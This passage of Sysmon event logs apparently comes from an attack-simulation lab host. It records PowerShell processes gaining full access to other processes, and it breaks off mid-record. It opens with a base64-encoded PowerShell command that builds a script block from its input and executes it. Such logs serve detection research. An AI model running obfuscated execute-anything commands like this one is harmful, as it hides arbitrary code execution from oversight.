JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nSourceProcessId: 4920\r\nSourceThreadId: 3012\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","SourceProcessId":"4920","SourceThreadId":"3012","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 